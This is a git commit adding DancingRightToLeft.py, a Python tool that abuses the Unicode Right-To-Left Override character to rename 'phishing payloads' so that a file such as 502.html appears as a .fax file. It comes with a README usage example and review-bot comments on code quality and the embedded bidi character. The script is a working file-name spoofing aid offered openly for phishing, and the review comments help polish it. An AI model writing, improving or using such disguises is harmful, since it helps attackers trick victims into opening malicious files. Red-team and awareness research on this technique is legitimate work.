Added DancingRightToLeft.py script.

This commit is contained in:
mgeeky 2022-02-06 22:24:09 +01:00
parent 6079c3aefe
commit b12ab57e05
2 changed files with 138 additions and 0 deletions

@ -0,0 +1,112 @@
#!/usr/bin/python3
#
# A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
#
# Sources:
# - http://unicode.org/reports/tr36/#Bidirectional_Text_Spoofing
# - https://www.mozilla.org/en-US/security/advisories/mfsa2009-62/
# - https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
# - https://twitter.com/ffforward/status/1486743442801704974
#
# Mariusz Banach, mgeeky, "22
# <mb [at] binary-offensive.com>
#
import os, sys
import shutil
import string
import argparse
RTLO = '\u202E' # Right-To-Left Override
def rightToLeftOverride(phrase):
for i in range(len(phrase)-1)[::-1]:
if options['simulate']:
cand = phrase[:i] + phrase[i:][::-1]
else:
cand = phrase[:i] + Constants['RTLO'] + phrase[i:]
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <filename> <decoy-extension>')
parser.add_argument('filename', help='Payload file that we wish to rename.')
parser.add_argument('decoy_extension', help='Extension that we wish our payload to mimic via RTLO')
parser.add_argument('-p', '--padding', default=' ', help='If current file extension length is different than decoy extension length, pad filename with this character. Default: space.')
args = parser.parse_args()
args.filename = os.path.abspath(args.filename)
if args.decoy_extension.startswith('.'):
args.decoy_extension = args.decoy_extension[1:]
if '.' not in args.filename:
print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
sys.exit(1)
return args
def main(argv):
print('''
:: Dancing Right-To-Left
A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
''')
args = opts(argv)
if not args:
return False
filename, ext = os.path.splitext(args.filename)
filename2 = os.path.basename(filename)
ext = ext.replace('.', '')
if len(ext) == 0:
print('[!] Input filename does not have extension! You must point this script to the existing file having some original extension.')
sys.exit(1)
targetext = args.decoy_extension[::-1]
q = ''
if len(targetext) < len(ext):
filename2 += (len(ext) - len(targetext)) * args.padding
q = '"'
elif len(targetext) > len(ext):
filename2 += (len(targetext) - len(ext)) * args.padding
q = '"'
out1 = filename2 + '\\u202e' + targetext + '.' + ext
rest = targetext + '.' + ext
out2 = filename2 + rest[::-1]
out3 = filename2 + RTLO + targetext + '.' + ext
print(f'''INPUT:
Payload Filename : {os.path.basename(args.filename)}
Payload Extension : {q}.{ext}{q}
Decoy payloads' extension as : {q}.{args.decoy_extension}{q}
OUTPUT:
Your file was named in following way : {q}{out1}{q}
Your filename will look like this (simulated) : {q}{out2}{q}
Your filename will look like this (real display) : {out3}
''')
old = args.filename
new = os.path.dirname(old) + os.sep + filename2 + RTLO + targetext + '.' + ext
#
# Using manual bytes copy cause I was having some weird issues with shutil.copy()
#
with open(old, 'rb') as oldfile:
with open(new, 'wb') as newfile:
newfile.write(oldfile.read())
if __name__ == '__main__':
main(sys.argv)
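Review bot: `rightToLeftOverride()` (the `def` right after the `RTLO` constant) references `options['simulate']` and `Constants['RTLO']`, neither of which is defined anywhere in the file, and it builds `cand` without ever returning or using it; since `main()` never calls it, the function is dead code that would raise `NameError` if anyone did call it, so either drop it or make it the single place that builds the renamed string (e.g. `return phrase[:i] + RTLO + phrase[i:]`) and have `main()` use it instead of repeating the `filename2 + RTLO + targetext + '.' + ext` expression for `out3` and `new`. Smaller points in the same hunk: `shutil` and `string` are imported but unused (the comment above the copy loop explains why `shutil.copy()` was avoided, so the import can go); the `if '.' not in args.filename` check runs on the absolute path, so a dotted directory name such as `/home/j.doe/payload` lets an extension-less file through and the real guard is the `len(ext) == 0` check in `main()`, making the earlier one redundant and misleading; the two padding branches compute the same thing and collapse to `filename2 += abs(len(targetext) - len(ext)) * args.padding`; and `open(new, 'wb')` silently overwrites an existing file, so an `os.path.exists(new)` check before the copy would be safer.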

@ -1,6 +1,32 @@
## Phishing and Social-Engineering related scripts, tools and CheatSheets ## Phishing and Social-Engineering related scripts, tools and CheatSheets
- **`DancingRightToLeft.py`** - A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
```
PS> py DancingRightToLeft.py 502.html fax
:: Dancing Right-To-Left
A script abusing Right-To-Left Override unicode byte to rename phishing payloads.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
INPUT:
Payload Filename : 502.html
Payload Extension : ".html"
Decoy payloads' extension as : ".fax"
OUTPUT:
Your file was named in following way : "502 \u202exaf.html"
Your filename will look like this (simulated) : "502 lmth.fax"
Your filename will look like this (real display) : 502 xaf
```
- [**`decode-spam-headers.py`**](https://github.com/mgeeky/decode-spam-headers) - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and using **79+** tests will attempt to decode them as much as possible. - [**`decode-spam-headers.py`**](https://github.com/mgeeky/decode-spam-headers) - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and using **79+** tests will attempt to decode them as much as possible.
This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them. This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them.
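Review bot: the fenced example embeds the literal U+202E character on the "real display" line (the one rendered here as `502 xaf`), which displays differently depending on the viewer's bidi handling, is exactly the hidden-bidi-control pattern that GitHub and editors flag with a warning banner, and as shown has already lost the `.html` part in this rendering; suggest keeping only the escaped form (`"502 \u202exaf.html"`) in the README and describing the rendered result in words, e.g. "shown by Explorer as `502 lmth.fax`". The entry also does not mention the `-p/--padding` option the script accepts, so a one-line note on it next to the usage example would help.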